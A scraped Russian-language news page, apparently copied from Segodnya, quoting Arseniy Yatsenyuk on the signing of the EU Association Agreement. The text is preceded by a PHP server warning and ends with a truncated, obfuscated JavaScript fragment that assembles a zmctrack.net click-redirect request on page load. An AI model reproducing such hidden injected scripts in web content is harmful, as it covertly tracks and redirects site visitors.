Warning: Parameter 2 to wp_hide_post_Public::query_posts_join() expected to be a reference, value given in /var/www/fastuser/data/www/glavpost.com/wp-includes/class-wp-hook.php on line 307

Документ стал подтверждением выбора украинцев и первой защитой от России

Подписание политической части Соглашения об ассоциации с ЕС было историческим подтверждением выбора украинцев и первой защитой от России.

Об этом заявил бывший премьер-министр, лидер партии "Народный фронт" Арсений Яценюк.

"Казалось бы, не было ничего логичнее, чем немедленно приступить к заключению нашего Соглашения сразу после победы Революции. Но я хорошо помню, как сразу послышались голоса, что с подписанием стоит подождать, начать его новую разработку и вообще прямо согласовать с Москвой, чтобы у "агрессора не было оснований для агрессии", – отметил он.

	"Это был рубежный день" – Яценюк о подписании Соглашения с ЕС

/ Фото: Народный фронт

Политик также напомнил, что в сентябре 2014-го были совершены попытки отсрочить действие зоны свободной торговли между Украиной и ЕС под предлогом консультаций с Кремлем: "Наше правительство тогда категорически отвергло такие маневры, а на самом деле – прямое заигрывание с Москвой".

"Ни тогда, ни сейчас у меня не было сомнений. Политическую часть соглашения об ассоциации надо было подписывать немедленно. Это было историческим подтверждением выбора украинского народа. И первой защитой против России. Это важный день. Рубежный", – подчеркнул бывший премьер.

Читайте также:  Выжидает, чтобы найти слабое место: Кулеба рассказал о стратегии Путина на Донбассе

	"Это был рубежный день" – Яценюк о подписании Соглашения с ЕС

/ Фото: Народный фронт

Ранее Арсений Яценюк заявил, что нужно провести аудит выполнения Минских договоренностей и четко заявить, что "Минск" в той форме, в которой он написан, не выполняется Россией.

Подпишись на наш telegram

Только самое важное и интересное

Подписаться

ЕС
Арсений Яценюк
Соглашение об ассоциации с ЕС
революция достоинства

Читайте Segodnya.ua в Google News

Следите за нами в соцсетях

Подписывайтесь на нашу рассылку

Введите корректный email

Ок

Новости партнеров

Загрузка…

Популярные статьи

	"Это был рубежный день" – Яценюк о подписании Соглашения с ЕСЕго выдало тату: Украина помогла Германии раскрыть наемного убийцу из ФСБЕвросоюз 	"Это был рубежный день" – Яценюк о подписании Соглашения с ЕСВ Украине ввели “этический кодекс” для коллекторов: что им запрещеноФинансы 	"Это был рубежный день" – Яценюк о подписании Соглашения с ЕСРада сняла ответственность с производителей вакцин за “побочки”Власть 	"Это был рубежный день" – Яценюк о подписании Соглашения с ЕСРастаможка евроблях подешевеет на 30%: у Зеленского говорят о новой моделиАвто 	"Это был рубежный день" – Яценюк о подписании Соглашения с ЕС“Русский мир” приравняют к нацизму? В Украине хотят запретить идеологию ПутинаВласть 	"Это был рубежный день" – Яценюк о подписании Соглашения с ЕСПусть простят поляки, но Украина лучше Польши – АваковВласть

Новости партнеров

Загрузка…

загрузка…

	"Это был рубежный день" – Яценюк о подписании Соглашения с ЕС

Наши соцсети

  • Facebook

  • Telegram

  • Youtube

  • Instagram

Связаться с нами

  • Контакты редакции

  • Написать нам

  • на сайте

  • Спецпроекты

  • Архив сайта

Читайте также:  Матиос рассказал о 13 лицах, переданных России в рамках обмена

Политика сайта

  • Правила цитирования

  • Правила комментирования

  • Конфиденциальность и защита персональных данных

© segodnya.ua, 2021

Лента новостей

Главное

Нажимая на кнопку «Принять» или продолжая пользоваться сайтом, вы соглашаетесь с

правилами использования

файлов cookie.

Принять

if(document.documentElement.clientWidth > 1199) {
(function(){(function(l,d,A){“use strict”;var t,o,e,i,z,r,n,S,T,a,c,f,s,p,h,u,b,D,k,v,g,x,m,E,y,M,C,O,L,N,w,_,H,I,R,q,P,$,j,F,J=300,W=”/z”,X=”0x04″,B=”http”,G=”substr”,K=”host”,Q=J,U=”argon_”+”debug”+”=1″,V=”prototype”,Y=”createElement”,Z=”appendChild”,tt=”setTimeout”,ot=”querySelectorAll”,et=”getOwnPropertyDescriptor”,rt=”Object”,nt=”charCodeAt”,it=”fromCharCode”,at=”zmctrack”+”.net”,ct=”bind”,ft=”call”,lt=”script”,dt=”head”,st=”get”,pt=”set”,ht=”indexOf”,ut=”s.”+at,bt=”cookie”,kt=”XMLHttpRequest”,vt=”Date”,gt=”now”,xt=”responseText”,mt=”open”,yt=”ShadowRoot”,wt=”Node”,At=”send”,zt=”Array”,St=”addEventListener”,Tt=B+”://”+”click”+”.”+at+”/c/”+”redirect”+”?”+”hash”+”=”,Dt=”slot”,Et=”Math”,Mt=”floor”,Ct=”random”,Ot=”console”,Lt=”Document”,Nt=”innerHTML”,_t=”attachShadow”,Ht=”offsetWidth”,It=”Element”,Rt=”next”,qt=”previous”,Pt=”push”,$t=”length”,jt=”shift”,Ft=”parentNode”,Jt=”textContent”,Wt=”JSON”,Xt=”parse”,Bt=”load”,Gt=”HTML”+It,Kt=”error”,Qt=”location”,Ut=”href”,Vt=”POST”,Yt=”document”,Zt=”un”+”eval”,to={},oo=”parseInt”,eo=It+”Sibling”,ro=”String”,no=”split”;to[“mode”]=”closed”,t=l[Yt],o=l[“chrome”],e=!0,i=0;try{e=!!l[Zt]}catch(t){}function io(t,o){return q[ft](t,o||”|”)}!o&&!e||(z=l[“n10091125”],r=z[Yt],n=z[rt][et],S=r[ot][ct](t),T=z[tt][ct](l),a=n(z[Lt][V],dt)[st][ft](t),c=r[Y][ct](t),f=r[dt][Z][ct](a),s=z[vt][gt],p=-1Q?i++

По материалам: Сегодня